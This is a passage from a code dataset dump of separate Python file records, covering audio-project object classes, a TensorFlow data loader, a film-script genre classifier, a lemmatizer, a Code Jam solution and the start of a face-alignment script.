x.append(self.pad(self.chars_to_idxs(self.chars[idx:idx+size]),size))\n y.append(self.char_to_idx(self.chars[idx+size]))\n\n y = np_utils.to_categorical(y)\n\n return 
np.array(x),y","sub_path":"getText.py","file_name":"getText.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"529640614","text":"\nimport abc\nimport json\nimport os\nimport random as rd\nimport re\nimport types\n\nimport soundfile as sf\nfrom pydub import AudioSegment as pd\n\nfrom src.data_types import *\nfrom src.errors import *\nfrom src.globals import RelGlobals, Settings\nfrom src.input_processing import inpt, inpt_validate, input_dir, input_file, autofill\nfrom src.method_ops import (ArgData, Category, RelData, _ClsRelData,\n add_reldata, add_reldata_arg, get_reldata,\n get_wrap_all_encloser, has_aliases,\n is_public_process, is_rel_wrap_all, public_process,\n rel_wrap)\nfrom src.output_and_prompting import (critical_err_mess, err_mess, info_block,\n info_line, info_list, info_title,\n log_err, nl, p, section_head, show_error,\n style)\nfrom src.path import join_path, split_path\n\n\nclass RelObject(abc.ABC):\n \"\"\"\n base rel object class\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__()\n for k,v in kwargs.items():\n setattr(self, k, v)\n if is_rel_wrap_all(self):\n self._do_wrap_all()\n\n def _do_wrap_all(self):\n \"\"\"\n wrapping\n \"\"\"\n encloser = get_wrap_all_encloser(self)\n for attr in dir(self):\n if \"__\" not in attr:\n if is_public_process(getattr(self, attr)):\n print(\"a\", type(getattr(self, attr)), getattr(self,attr).__name__)\n new_val = rel_wrap(encloser)(getattr(self, attr))\n setattr(self, attr, new_val)\n\n def parse_write_meta(self, attrs):\n return attrs\n\n @abc.abstractmethod\n def file_ref_repr(self):\n \"\"\"\n how obj is referenced in other object's files\n \"\"\"\n ...\n\n\n\nclass RelContainer(RelObject):\n \"\"\"\n class for objects that are not saved to a file but directly as strings \n in other files\n implement:\n load(self_clss, data) # staticmethod\n file_ref_data(self)\n \"\"\"\n\n setfile_extension = \"rel-set\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def class_data_repr(self):\n mod = self.__class__.__module__\n clss = self.__class__.__name__\n return \"{0},{1}\".format(mod, clss)\n\n def file_ref_repr(self):\n \"\"\"\n don't override. 
string repr for standalone file references\n \"\"\"\n data_str = json.dumps(self.file_ref_data(), separators=(\",\",\":\"))\n return self.class_data_repr() + \";\" + data_str\n\n def get_set_filename(self, attr_name):\n return attr_name + \".\" + self.__class__.__name__\n\n def get_setfile_fullpath(self, attr_name, path):\n return join_path(path, self.get_set_filename(attr_name) + \".\" + self.setfile_extension)\n\n @abc.abstractmethod\n def file_ref_data(self):\n \"\"\"\n data in primitive types form needed to restore obj with load()\n \"\"\"\n ...\n\n @staticmethod\n @abc.abstractmethod\n def load(self_clss, data):\n \"\"\"\n load object from data returned by file_ref_data\n \"\"\"\n ...\n\n\n\n\nclass RelSavedObj(RelObject):\n \"\"\"\n methods to implement on classes that inherit from this:\n save (if any additional file saving needed beyond save_metadata)\n parse_write_meta (for save_metadata)\n rename (that calls super, and only handles renaming files)\n file_ref_repr (if not the standard name.reltype)\n validate_child_name\n pre_process and post_process\n \"\"\"\n\n datafile_extension = \"rel-obj\"\n\n def __init__(self, rel_id, reltype, name, path, parent, custom_path=False, **kwargs):\n super().__init__(**kwargs)\n self.parent = parent\n self.reltype = reltype\n self.name = name\n if path is None and not custom_path:\n if self.parent is not None:\n self.path = self.parent.get_data_dir()\n else:\n if Settings.is_debug():\n err_mess(\"Warning: Setting relative path for {0} '{1}'\".format(self.reltype, self.name))\n self.path = \"./\"\n else:\n raise UnexpectedIssue(\"Path is None, with no parent\")\n os.makedirs(self.get_data_dir(), exist_ok=True)\n else:\n self.path = path # path not including object's own directory\n self.rel_id = rel_id if rel_id is not None else RelGlobals.get_next_id()\n if path is not None and reltype != \"Program\":\n os.makedirs(self.get_data_dir(), exist_ok=True)\n\n def get_data_dir(self):\n \"\"\"\n get the directory of this object's files\n \"\"\"\n return join_path(self.path, self.get_data_filename(), is_dir=True)\n\n def get_data_filename(self, name=None):\n \"\"\"\n name.reltype : name of directory and datafiles. \n args:\n name: should not be included unless testing a new name\n \"\"\"\n if name == None:\n name = self.name\n return name + \".\" + self.reltype\n\n def get_datafile_fullpath(self):\n \"\"\"\n fullpath of datafile\n \"\"\"\n return join_path(self.get_data_dir(), self.get_data_filename(), ext=self.datafile_extension)\n\n def get_path(self, filename, extension=\"obj\"):\n \"\"\"\n get path to a file or dir \n args:\n extension: \"obj\" for datafile_extension, \"dir\" for directory, or \"wav\"\n \"\"\"\n is_dir = False\n if extension == \"obj\":\n extension = self.datafile_extension\n elif extension in (\"wav\",):\n pass\n elif extension == \"dir\":\n is_dir = True\n extension = None\n else:\n raise UnexpectedIssue(\"Unrecognized extension '{0}'. 
Add it in RelObject.get_path\".format(extension))\n\n path = join_path(self.get_data_dir(), filename, ext=extension, is_dir=is_dir)\n return path\n\n @public_process\n def rename(self, name=None):\n \"\"\"\n cat: meta\n dev: call this method via super, and implement renaming of files other than \n datafile and its self.path directory\n \"\"\"\n old_name = self.name\n if old_name is not None:\n old_data_dir = self.get_data_dir()\n old_datafile_name = self.get_data_filename()\n\n if name is None:\n p(\"Give this {0} a name\".format(self.reltype))\n name = inpt(\"obj\")\n else:\n name = inpt_validate(name, 'obj')\n\n # validate\n if hasattr(self.parent, \"validate_child_name\"):\n if self.parent.validate_child_name(self, name):\n self.name = name\n info_block(\"Named '{0}'\".format(name))\n else:\n err_mess(\"Invalid name\")\n self.rename()\n else:\n if Settings.is_debug():\n show_error(\n AttributeError(\"Parent obj '{0}' does not have validate_child_name\".format(self.parent))\n )\n else:\n try:\n log_err(\"Parent object type {0} has no 'validate_child_name' method\".format(self.parent.reltype))\n except AttributeError:\n log_err(\"Parent object '{0}' of '{1}' has no 'validate_child_name' method\".format(self.parent, self))\n self.name = name\n info_block(\"Named '{0}'\".format(name))\n \n # if actual renaming and not an initial naming\n if old_name is not None:\n new_data_dir = self.get_data_dir()\n # rename dir\n os.rename(old_data_dir, new_data_dir)\n\n # rename datafile (which is in newdatadir now)\n old_datafile = join_path(new_data_dir, old_datafile_name, ext=self.datafile_extension)\n new_datafile = self.get_datafile_fullpath()\n os.rename(old_datafile, new_datafile)\n\n def save_props(self):\n \"\"\"\n get attr names of all property values\n \"\"\"\n from src.property import RelProperty\n prop_attrs = [i for i in dir(self) if i.startswith(RelProperty.attr_prefix)]\n for i in prop_attrs:\n prop = getattr(self, i)\n try:\n prop.save()\n except AttributeError:\n pass\n\n @public_process\n def save(self):\n \"\"\"\n cat: save\n dev: default save, calls save_meta and saves props. override for additional saving\n \"\"\"\n self.save_metadata()\n self.save_props()\n\n def save_metadata(self):\n \"\"\"\n define parse_write_meta(dict: attrs) to define which attrs to write\n \"\"\"\n info_block(\"saving {0} '{1}' metadata...\".format(self.reltype, self.name))\n\n # must copy list, otherwise we will edit this object's __dict__\n attrs = {k:v for k,v in vars(self).items()}\n attrs = self.parse_write_meta(attrs)\n try:\n del attrs[\"_rel_data\"]\n except KeyError:\n pass\n attrs[\"__module__\"] = self.__class__.__module__\n attrs[\"__class__\"] = self.__class__.__name__\n\n from src.project_loader import RelTypeEncoder\n attrs = RelTypeEncoder.parse_container_obj_sets(attrs, self.get_data_dir())\n\n fullpath = self.get_datafile_fullpath()\n\n with open(fullpath, 'w') as f:\n json.dump(attrs, fp=f, cls=RelTypeEncoder, indent=2)\n\n def parse_write_meta(self, attrs):\n \"\"\"\n override when applicable. remove attrs that shouldnt \n be json encoded to file (e.g. audio data) by overriding this method\n \"\"\"\n return super().parse_write_meta(attrs)\n\n def file_ref_repr(self):\n \"\"\"\n don't override. 
how this object is referenced in other objects json data files\n \"\"\"\n return self.get_data_filename()\n\n def post_process(self, method_obj):\n \"\"\"\n override with super() to provide post processing\n \"\"\"\n if get_reldata(method_obj, \"category\") == Category.META:\n self.save_metadata()\n\n\n\nclass RelAudioObj(RelSavedObj):\n \"\"\"\n object with audio\n \"\"\"\n\n def __init__(self, arr=None, rate=None, rel_id=None, reltype=None, name=None,\n path=None, parent=None, **kwargs):\n super().__init__(rel_id=rel_id, reltype=reltype, name=name, path=path,\n parent=parent, **kwargs)\n\n self.arr = arr\n self.rate = rate\n\n def get_audiofile_fullpath(self):\n \"\"\"\n datafile path, but wav extension instead\n \"\"\"\n return self.get_path(self.get_data_filename(), extension=\"wav\")\n\n @public_process\n def save(self):\n \"\"\"\n cat: save\n dev: default save method, just calls save_metadata. override for additional saving\n \"\"\"\n super().save()\n self.save_audio()\n\n def parse_write_meta(self, attrs):\n \"\"\"\n override with super() call when applicable. remove attrs that shouldnt \n be json encoded to file (e.g. audio data) by overriding this method\n \"\"\"\n attrs = super().parse_write_meta(attrs)\n del attrs['arr']\n if self.arr is None:\n attrs[\"file\"] = None\n else:\n attrs[\"file\"] = self.get_audiofile_fullpath()\n return attrs\n\n def save_audio(self):\n \"\"\"\n base wav audio saving. requires 'rate' and 'arr' attributes\n \"\"\"\n info_block(\"saving audio of {0} '{1}'...\".format(self.reltype, self.name))\n if self.arr is None:\n info_line(\"no audio to save...\")\n else:\n sf.write(self.get_audiofile_fullpath(), self.arr, self.rate.magnitude)\n\n def read_file(self, file_path=None):\n \"\"\"\n reads files for recording object init\n takes multiple formats (via PyDub and Soundfile)\n updates self.source, self.arr, self.rate\n \"\"\"\n if file_path is None:\n print(\" Choose an input sound file...\")\n time.sleep(1)\n file_path = input_file()\n\n info_block(\"Reading audio file...\")\n t1 = time.time()\n\n # Handling file types\n _,_,ext = split_path(file_path)\n if ext != \"wav\":\n try:\n not_wav = pd.from_file(file_path, file_path.ext)\n not_wav.export(\".temp_soundfile.wav\", format=\"wav\")\n file_path = \".temp_soundfile.wav\"\n except FileNotFoundError:\n print(\" > unable to find file '{0}'\".format(file_path))\n print(\" > make sure to include .wav/.mp3/etc extension\")\n return self.read_file()\n \n # self.source_block[\"file\"] = file_path\n # Reading and Processing File\n try:\n self.arr, rate = sf.read(file_path)\n self.rate = Units.rate(rate)\n except RuntimeError:\n print(\" > unable to find or read '{0}'. 
Is that the correct extension?\".format(file_path))\n return self.read_file()\n try:\n os.remove(\".temp_soundfile.wav\")\n except FileNotFoundError:\n pass\n if len(self.arr.shape) < 2:\n self.arr = NpOps.stereoify(self.arr)\n t2 = time.time()\n info_line(\"sound file '{0}' read successfully in {1:.4f} seconds\".format(\n file_path, t2-t1))\n\n\n\nclass RelPublicObj(RelObject):\n \"\"\"\n methods to implement on classes that inherit from this:\n save (if any additional file saving needed beyond save_metadata)\n parse_write_meta (for save_metadata)\n rename (that calls super, and only handles renaming files)\n file_ref_repr (if not the standard name.reltype)\n validate_child_name\n pre_process and post_process\n \"\"\"\n\n def __init__(self, name, reltype, mode, **kwargs):\n\n super().__init__(name=name, reltype=reltype, **kwargs)\n\n if mode == \"create\":\n section_head(\"Initializing {0}\".format(reltype))\n elif mode == \"load\":\n info_line(\"Loading {0} '{1}'\".format(reltype, name))\n elif mode == \"prop\":\n # property\n pass\n else:\n raise UnexpectedIssue(\"Unknown mode '{0}'\".format(mode))\n\n self.name = name\n self.reltype = reltype\n\n self._do_aliases()\n\n def _do_aliases(self):\n \"\"\"\n add all aliases\n \"\"\"\n if not hasattr(self, \"_rel_data\"):\n self._rel_data = _ClsRelData()\n alias_map = self._rel_data.alias_map\n # copy to prevent modifying what we iterate over\n dct = {k:getattr(self, k) for k in dir(self)}\n for meth_name,method in dct.items():\n if has_aliases(method):\n for alias in get_reldata(method, \"aliases\"):\n if hasattr(self, alias) or alias in alias_map:\n raise NameError(\"Class '{0}' already has method/name '{1}' that cannot be aliases\".format(\n self.__class__.__name__, alias))\n alias_map[alias] = meth_name\n\n def get_process(self, name):\n \"\"\"\n handles getting aliases too\n \"\"\"\n # endswith to handle namespaced attr names\n if hasattr(self, name):\n return getattr(self, name)\n try:\n real_name = self._rel_data.alias_map[name]\n return getattr(self, real_name)\n except:\n raise AttributeError(\"Object '{0}' has not attribute '{1}'\".format(self, name))\n\n def get_all_public_method_names(self):\n \"\"\"\n get the names of all public methods\n \"\"\"\n return [func for func in dir(self) if is_public_process(getattr(self, func))]\n\n def get_all_public_methods(self):\n all_objs = [getattr(self, i) for i in dir(self)]\n return [i for i in all_objs if is_public_process(i)]\n\n def get_all_prop_names(self):\n from src.property import RelProperty\n return [i for i in dir(self) if \"__\" not in i and isinstance(getattr(self, i), RelProperty)]\n\n def parse_write_meta(self, attrs):\n \"\"\"\n override with super() call\n \"\"\"\n attrs = super().parse_write_meta(attrs)\n try:\n del attrs[\"edit_property\"]\n except KeyError: pass\n return attrs\n\n @public_process\n def property(self, prop_name):\n \"\"\"\n cat: property\n desc: edit a property\n args:\n property name: one of the following:\n dev: the possible args are generated in options on display\n \"\"\"\n all_prop_names = self.get_all_prop_names()\n if not all_prop_names:\n err_mess(\"This {0} has no properties to edit\".format(self.reltype))\n try:\n prop_name = autofill(prop_name, all_prop_names)\n except AutofillError as e:\n err_mess(\"This {0} has property named '{1}'\".format(self.reltype, e.word))\n else:\n # RelProp.process() method\n getattr(self, prop_name).process()\n\n @public_process\n def options(self):\n \"\"\"\n cat: info\n desc: list all process options that can be run 
on this object (shortcut 'o')\n \"\"\"\n nl()\n with style(\"cyan\"):\n info_block(\"{CATEGORY}\", indent=2)\n info_line(\"- {Process}\")\n info_line(\"{arguments in order, optional if in [square brackets]}\", indent=8)\n nl()\n\n meths = {}\n for mth in self.get_all_public_methods():\n cat = get_reldata(mth, \"category\")\n try:\n meths[cat].append(mth)\n except KeyError:\n meths[cat] = [mth]\n\n categories = list(meths.keys())\n # sort by category.value, which is the string representation of that category\n categories.sort(key=lambda x: x.value)\n for cat in categories:\n with style(\"cyan\"):\n info_line(cat.value.upper(), indent=2)\n for method in meths[cat]:\n method._rel_data.display()\n if cat == Category.PROPERTY:\n prop_names = self.get_all_prop_names()\n if not prop_names:\n info_line(\"(no properties to edit)\", indent=10)\n else:\n for i in prop_names:\n info_line(\"* \" + i, indent=10)\n\n @public_process\n def quit(self):\n \"\"\"\n cat: save\n desc: exit to parent process (shortcut 'q')\n dev: this is handled in input_processing\n \"\"\"\n # this is usually actually raised in process()\n raise Cancel\n\n\n\n\n\nclass SourceInfo(RelObject):\n \"\"\"\n class for saving source info\n \"\"\"\n\n def __init__(self, s_type, s_name, s_info=None):\n self.s_type = s_type\n self.s_name = s_name\n self.s_info = {} if s_info is None else s_info\n \n\n def show(self):\n \"\"\"\n like repr but prints directly\n \"\"\"\n info_line(\"Sourced from {0} '{1}':\".format(self.s_type, self.s_name))\n for k,v in self.s_info.items():\n info_list(\"{0}: {1}\".format(k,v))\n\n def set_info(self, info):\n \"\"\"\n set info from dict\n \"\"\"\n self.s_info.update(info)\n","sub_path":"src/rel_objects.py","file_name":"rel_objects.py","file_ext":"py","file_size_in_byte":19224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"332591537","text":"import os\nimport tensorflow as tf\nfrom helpers import get_record_path\n\n\nAUTOTUNE = tf.data.experimental.AUTOTUNE\n\n\ndef get_tfrecords(dataset_type, augmented):\n path = get_record_path(dataset_type, None, augmented)\n file_list = os.listdir(path)\n return [os.path.join(path, name) for name in file_list]\n\n\ndef decode(serialized_example, modal_type):\n features = tf.io.parse_single_example(\n serialized_example,\n features={\n 'height': tf.io.FixedLenFeature([], tf.int64),\n 'width': tf.io.FixedLenFeature([], tf.int64),\n 'depth': tf.io.FixedLenFeature([], tf.int64),\n 'bmode': tf.io.FixedLenFeature([], tf.string),\n 'pd': tf.io.FixedLenFeature([], tf.string),\n 'label': tf.io.FixedLenFeature([], tf.string)\n }\n )\n\n volume_shape = tf.stack([features['height'], features['width'], features['depth']])\n\n if modal_type == \"multi_modal\":\n bmode = tf.io.decode_raw(features['bmode'], tf.float32)\n bmode = tf.reshape(bmode, volume_shape)\n bmode = tf.expand_dims(bmode, axis=-1)\n bmode = tf.cast(bmode, tf.float32)\n\n pd = tf.io.decode_raw(features['pd'], tf.float32)\n pd = tf.reshape(pd, volume_shape)\n pd = tf.expand_dims(pd, axis=-1)\n pd = tf.cast(pd, tf.float32)\n\n input_vol = {\n \"input_1\": bmode,\n \"input_2\": pd\n }\n else:\n input_vol = tf.io.decode_raw(features[modal_type], tf.float32)\n input_vol = tf.reshape(input_vol, volume_shape)\n input_vol = tf.expand_dims(input_vol, axis=-1)\n input_vol = tf.cast(input_vol, tf.float32)\n\n label = tf.io.decode_raw(features['label'], tf.uint8)\n label = tf.reshape(label, volume_shape)\n label = tf.expand_dims(label, axis=-1)\n label = tf.cast(label, 
tf.uint8)\n\n return input_vol, label\n\n\ndef load_dataset(dataset_type, batch_size, num_epochs, modal_type, augmented=False):\n files = get_tfrecords(dataset_type, augmented)\n dataset = tf.data.TFRecordDataset(files)\n dataset = dataset.map(lambda x: decode(x, modal_type))\n dataset = dataset.batch(batch_size)\n if dataset_type == \"train\":\n dataset = dataset.repeat(num_epochs)\n return dataset.prefetch(buffer_size=AUTOTUNE)\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"635718987","text":"import os\nimport pandas as pd\nimport string\nimport nltk\nimport nltk.corpus\nfrom nltk.corpus import stopwords\nimport gensim\nfrom gensim import corpora, models\nfrom time import gmtime, strftime\nfrom collections import Counter\nimport itertools\nimport pyLDAvis\nimport pyLDAvis.gensim\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\nimport pickle\n\n\n\n# ORGANIZES THREE SEPERATE CORPUS FOR INPUT DATA\ndef cmu_data_matrix(texts, tsv):\n\n \n with open(texts, encoding='utf-8') as text_file:\n lines = text_file.readlines()\n texto = [i.split('\\t') for i in lines]\n\n # resolve refrences \n text_dict = {int(iD):texts for iD, texts in texto }\n\n # initiate dataframe\n column_names = ['Wiki movie ID', 'Freebase movie ID', 'Movie Name', 'Movie release data', 'Movie box office', 'Movie runtime',\n 'Movie languages', 'Movie Countries', 'Movie Genres']\n \n #populate database\n movie_data_matrix = pd.read_csv(tsv, sep='\\t', names=column_names)\n movie_data_matrix['text'] = movie_data_matrix['Wiki movie ID'].map(text_dict)\n movie_data_matrix['genre_data'] =[set(eval(i.lower()).values()) for i in movie_data_matrix['Movie Genres']]\n \n print('Intial shape of data %s' %str(movie_data_matrix.shape))\n \n #filter by language and available texts\n movie_data_matrix_english=movie_data_matrix.loc[movie_data_matrix['Movie languages'].str.contains(\"english\", case=False)]\n print('Shape of data for english films %s' %str(movie_data_matrix_english.shape))\n matrix = movie_data_matrix_english.dropna(subset=['text'])\n print('Shape of data for english films with source text %s' %str(matrix.shape))\n \n corpus = matrix.text.tolist()\n print('Final size of corpus %s' %str(len(corpus)))\n \n #create genre_labels \n genre_distribution = Counter(itertools.chain(*matrix['genre_data']))\n del genre_distribution['drama']\n del genre_distribution['comedy'] \n \n matrix = matrix.dropna(subset=['genre_data'])\n \n \n matrix['labels'] = [sorted(list((genre_distribution[x],x) for x in genre), reverse=True)[:1]\n for genre in matrix['genre_data']]\n print('Shape of data for english films with source text and genre labels %s' %str(matrix.shape))\n\n matrix.to_csv('cmu_data.csv')\n \n return matrix\n\ndef film2_data_matrix():\n\n path = \"/Users/ViVeri/Desktop/ISO_Networks/imsdb_raw_nov_2015\"\n\n name = []\n filenames = []\n text = []\n\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".txt\"):\n \n\n name.append(file)\n filenames.append(os.path.join(root, file))\n\n for i in filenames:\n with open(i) as inputfile:\n screenplay_raw = inputfile.read().strip('\\t\\n\\r')\n screenplay=' '.join(screenplay_raw.split())\n text.append(screenplay)\n \n \n\n\n labels =[os.path.dirname(i).split('/')[-1] for i in filenames]\n \n matrix =pd.DataFrame({'name':name, 'text': text, 'labels':labels})\n\n matrix.to_csv('film2_data.csv')\n\n 
print('Shape of data for Film2.0 corpus %s' %str(matrix.shape))\n\n return matrix\n \ndef tv_data_matrix():\n\n path = \"/Users/ViVeri/Desktop/ISO_Networks/tv_raw_2018\"\n\n name = []\n filenames = []\n text = []\n\n #access all files in tv corpus directory \n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".txt\"):\n \n name.append(file)\n filenames.append(os.path.join(root, file))\n\n #read all of those files and append to list\n for i in filenames:\n with open(i) as inputfile:\n text.append(inputfile.read().replace('\\t',\"\" ).replace('\\n', '').strip())\n \n\n\n show =[os.path.dirname(i).split('/')[-2] for i in filenames]\n season = [os.path.dirname(i).split('/')[-1] for i in filenames]\n episode_num=[i.split('.')[0] for i in name]\n\n \n matrix =pd.DataFrame({'title_episode':name, 'text': text, \n 'name':show, 'season':season, 'episode_num':episode_num})\n\n print('Shape of data for TV_corpus %s' %str(matrix.shape))\n\n matrix.to_csv('tv_data.csv')\n \n return matrix\n\ndef universe_of_discourse():\n\t\tC = cmu_data_matrix('plot_summaries.txt','movie.metadata.tsv')\n\t\tprint('CMU collected')\n\t\tF = film2_data_matrix()\n\t\tprint('Film2.0 collected')\n\t\tT = tv_data_matrix()\n\t\tprint('TV_2018 collected')\n\n\t\treturn C, F, T\n\n# RUN TO CREATE INTIAL FILES \n# x = universe_of_discourse()\n\n#RUN WHEN FILES ARE CREATED\ndef load_universe():\n\tC = pd.DataFrame.from_csv('cmu_data.csv')\n\tF = pd.DataFrame.from_csv('film2_data.csv')\n\tT = pd.DataFrame.from_csv('tv_data.csv')\n\n\treturn C, F , T\n\n# DELIVERS LIST OF CURATED STOP WORDS \n\n\n\n# Machine Learning MODEL \nfrom sklearn.model_selection import StratifiedKFold, StratifiedShuffleSplit, GridSearchCV\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn import linear_model, decomposition\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.linear_model import LogisticRegression\n\ndef stop_words():\n \n stop_words1 = stopwords.words('english')\n \n with open('name_stopwords.tsv') as text_file:\n stop_words2 = text_file.read().lower().replace(',', \" \").split()\n \n stop_words3 = [i.lower() for i in nltk.corpus.names.words()]\n \n stopwords_theta= set(stop_words1+stop_words2+stop_words3)\n \n return stopwords_theta\n\n\npipeline = Pipeline([\n ('tfidf', TfidfVectorizer(stop_words=stop_words()),\n ('clf', OneVsRestClassifier(LogisticRegression(solver='sag'))))])\n\nparameters = {\n 'tfidf__max_df': (0.25, 0.5, 0.75),\n 'tfidf__ngram_range': [(1, 1), (1, 2), (1, 3)],\n \"clf__estimator__C\": [0.01, 0.1, 1],\n \"clf__estimator__class_weight\": ['balanced', None],\n}\n\n\ndef train_test_split(data_matrix):\n\tdata_x = data_matrix[['text']].as_matrix()\n\tdata_y = data_matrix.drop(['name', 'text'], axis=1).as_matrix()\n\n\tstratified_split = StratifiedShuffleSplit(n_splits=2, test_size=0.33)\n\tfor train_index, test_index in stratified_split.split(data_x, data_y):\n\t x_train, x_test = data_x[train_index], data_x[test_index]\n\t y_train, y_test = data_y[train_index], data_y[test_index]\n\n\t# transform matrix of plots into lists to pass to a TfidfVectorizer\n\ttrain_x = [x[0].strip() for x in x_train.tolist()]\n\ttrain_y = [x[0].strip() for x in y_train.tolist()]\n\ttest_x = [x[0].strip() for x in x_test.tolist()]\n\ttest_y = [x[0].strip() for x in y_test.tolist()]\n\n\treturn train_x, train_y, test_x, test_y\n\n\ngrid_search_tune = GridSearchCV(\n pipeline, parameters, cv=2, n_jobs=2, 
verbose=3)\ngrid_search_tune.fit(train_x, train_y)\n\n\nprint(\"Best parameters set:\")\nprint (grid_search_tune.best_estimator_.steps)\n\n\n# measuring performance on test set\nprint (\"Applying best classifier on test data:\")\nbest_clf = grid_search_tune.best_estimator_\npredictions = best_clf.predict(test_x)\n\nprint (classification_report(test_y, predictions, target_names=labels))\n\n\n\n\n\n\n\n","sub_path":"ISO_Networks.py","file_name":"ISO_Networks.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"192670508","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jul 6 03:45:40 2019\r\n\r\n@author: yasemin\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\n\r\narray1 = np.array([[1,2], [3,4]])\r\narray2 = np.array([[-1,-2], [-3,-4]])\r\n\r\n# vertical şeklinde birleştirir:\r\n\r\narray3= np.vstack((array1,array2))\r\n\r\n# horizontal şeklinde birleştitir.\r\n\r\narray4 = np.hstack((array1,array2))","sub_path":"numpybasics/stackingArrays.py","file_name":"stackingArrays.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"430790041","text":"#!/usr/bin/python3\n\nfrom glob import glob\nimport sys\nimport re\n\naffix_tables = []\nfile_list = glob('/home/cyril/personal/kp-lemmatizer/txt/molodtsov_script/*.txt')\nfor file_name in file_list:\n for line in open(file_name):\n line = line.strip()\n if line:\n # print(line)\n affix_tables.append(line.split(\",\", 2))\n\nword_info = {}\nfor line in sys.stdin:\n for word in line.split():\n if word not in word_info:\n word_info[word] = []\n for [from_str,to_str,info] in affix_tables:\n (base, sub_num) = re.subn(from_str,to_str,word)\n if sub_num > 0:\n word_info[word].append({'info': info, 'base': base})\n \nprint(word_info)\n","sub_path":"src/lemmatizer.py","file_name":"lemmatizer.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"147681685","text":"from math import sqrt, ceil\r\ndef pz(s, n):\r\n\tl = len(s)\r\n\treturn '0' * (n-l) + s\r\n\r\ndef gen_coin(n):\r\n\tif n <= 2:\r\n\t\tyield '11'\r\n\t\treturn\r\n\tfor i in range(int('1'*(n-2), 2)+1):\r\n\t\tyield '1' + pz(bin(i)[2:], n-2) + '1'\r\n\r\n# def indx(i):\r\n# \tj = 0\r\n# \twhile i > soe[j]:\r\n# \t\tj+=1\r\n# \tif i == soe[j]:\r\n# \t\treturn j\r\n# \treturn -1\r\n\r\ndef prime(n, i=3):\r\n\t# try:\r\n\t# \ts = soe.index(i)+1\r\n\t# except:\r\n\t# \ts = 0\r\n\t# for i in range(s, len(soe)):\r\n\t# \tif n % soe[i] == 0:\r\n\t# \t\treturn i\r\n\t# return -1\r\n\tif n % 2 == 0:\r\n\t\treturn 2\r\n\tsqn = ceil(sqrt(n))\r\n\twhile i < sqn:\r\n\t\tif n % i == 0:\r\n\t\t\treturn i\r\n\t\ti += 2\r\n\treturn 0\r\n\r\ndef s_of_e(n):\r\n\ta = [1]*(n+1)\r\n\t# a = 2**(n+1)-1\r\n\t# i = 1\r\n\t# c = 0\r\n\t# cn = a+1\r\n\t# while i < cn:\r\n\t# \tif a & i:\r\n\t# \t\tj = i\r\n\t# \t\twhile j < n:\r\n\t# \t\t\ta = a & ~j\r\n\t# \t\t\tj <<= c\r\n\t# \ti <<= 1\r\n\t# \tc += 1\r\n\tfor i in range(2, int(sqrt(n+1))+1):\r\n\t\tif a[i]:\r\n\t\t\tfor j in range(i*i, n+1, i):\r\n\t\t\t\ta[j] = 0\r\n\tb = [i for i in range(2, n+1) if a[i]]\r\n\treturn a, b\r\n\r\nd = set()\r\n\r\ndef f(n, j, s=''):\r\n\tji = 0\r\n\tl1 = [0] * (j)\r\n\tg = gen_coin(n)\r\n\tif s:\r\n\t\twhile next(g) != s:\r\n\t\t\tpass\r\n\tji = 0\r\n\tfor i in g:\r\n\t\tl = []\r\n\t\tkl = []\r\n\t\t# print(i)\r\n\t\tfor m in range(2, 11):\r\n\t\t\tk = 
int(i, m)\r\n\t\t\tkl.append(k)\r\n\t\t\t# if soea[k]:\r\n\t\t\t# \tbreak\r\n\t\t\t# p = prime(k)\r\n\t\t\t# if p == -1:\r\n\t\t\t# \tbreak\r\n\t\t\tif k in d:\r\n\t\t\t\tbreak\r\n\t\t\tp = prime(k)\r\n\t\t\tif not p:\r\n\t\t\t\td.add(k)\r\n\t\t\t\tbreak\r\n\t\t\td.add(p)\r\n\t\t\tl.append(p)\r\n\t\telse:\r\n\t\t\t# print(i)\r\n\t\t\tif ji >= len(l1):\r\n\t\t\t\tbreak\r\n\t\t\tprint(i, end=' ')\r\n\t\t\tfor j in l:\r\n\t\t\t\tprint(j, end=' ')\r\n\t\t\tprint()\r\n\t\t\t# for j in kl:\r\n\t\t\t# \tprint(j, end=' ')\r\n\t\t\t# print()\r\n\t\t\tl1[ji] = [i] + l\r\n\t\t\tji += 1\r\n\t\tif ji != j:\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tbreak\r\n\treturn l1\r\n\r\nt = input()\r\nn, j = input().split()\r\nn = int(n)\r\nj = int(j)\r\n# g = input()\r\n# print(n, j)\r\n# soea, soe = s_of_e(int('1'*n))\r\n# soe.append(int('1'*n))\r\nprint(\"Case #1:\")\r\nl = f(n, j)\r\n# print(l)\r\n# for i in l:\r\n# \tfor j in i:\r\n# \t\tprint(j, end=' ')\r\n# \tprint()\r\n","sub_path":"codes/CodeJamCrawler/16_0_3/shreyash14s/coin_jam.py","file_name":"coin_jam.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"456746025","text":"import cv2\nfrom align_dlib import AlignDlib\nfrom imutils.face_utils import rect_to_bb\nimport dlib\n\nfaceWidth = 360\nfaceLandmarkModel = \"shape_predictor_68_face_landmarks.dat\"\ntestimgPath = \"IMG_7492.jpg\"\n\nimage = 